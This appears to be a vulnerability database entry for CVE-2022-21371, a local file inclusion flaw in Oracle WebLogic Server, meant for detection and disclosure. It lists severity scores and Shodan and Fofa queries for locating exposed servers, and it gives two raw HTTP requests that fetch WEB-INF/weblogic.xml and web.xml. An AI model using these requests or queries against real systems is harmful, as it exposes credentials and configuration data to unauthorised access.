🔙 목록으로 돌아가기

CVE-2022-21371: Oracle WebLogic Server Local File Inclusion

TitleOracle WebLogic Server Local File Inclusion
Authorparadessia,narluin
SeverityHigh
ImpactAn attacker can read sensitive files containing credentials, configuration details, or other sensitive information.
RemediationApply the latest security patches provided by Oracle to fix the vulnerability.
CVSS Score7.5
EPSS Score0.94161
CVE IDCVE-2022-21371
CWE IDCWE-22
Shodan Queryhttp.title:"oracle peoplesoft sign-in"product:"oracle weblogic"
Fofa Querytitle="oracle peoplesoft sign-in"
Tags cve cve2022 lfi weblogic oracle packetstorm vkev vuln

🔍 Vulnerability Description

An easily exploitable local file inclusion vulnerability allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server. Supported versions that are affected are 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Successful attacks of this vulnerability can result in unauthorized and sometimes complete access to critical data.

🌐 HTTP Request

GET .//WEB-INF/weblogic.xml HTTP/1.1
Host: www.victim.com
GET .//WEB-INF/web.xml HTTP/1.1
Host: www.victim.com

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-21371.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-21371.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A